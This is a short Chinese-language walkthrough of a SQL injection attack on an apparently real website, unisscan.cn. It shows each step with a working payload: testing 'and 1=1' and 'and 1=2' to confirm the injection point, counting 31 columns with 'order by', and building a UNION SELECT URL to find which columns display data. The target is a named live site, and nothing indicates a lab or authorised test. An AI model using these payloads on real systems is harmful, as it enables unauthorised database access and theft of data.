(1)判断注入点
接着通过and 1=1 和 and 1=2测试发现前者正常,后者异常,可以肯定存在注入点,接下来判断该页面查询数据库的字段
(2)查询字段数
http://unisscan.cn/list.php?lei=246 order by n--
结果发现有31个字段
(3)看看哪些字段可以显示信息
http://unisscan.cn/list.php?lei=246 and 1=2 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--